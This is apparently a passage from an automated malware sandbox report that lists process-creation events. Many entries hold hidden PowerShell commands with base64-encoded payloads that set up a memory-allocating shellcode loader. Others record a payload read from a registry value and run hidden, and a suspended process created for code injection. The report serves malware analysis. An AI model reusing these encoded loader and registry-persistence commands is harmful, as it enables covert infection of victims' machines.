AbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsACAAcABsAGEAdABvAG4Aa Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsACAAcABsAGEAdABvAG4Aa Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tm43worv.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD568.tmp" "c:\Users\user\AppData\Local\Temp\CSCF0319BB5C3414E72AB519E7A67BBFBFC.TMP" Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process created: C:\Program Files\internet explorer\iexplore.exe c:\program files\internet explorer\iexplore.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIAD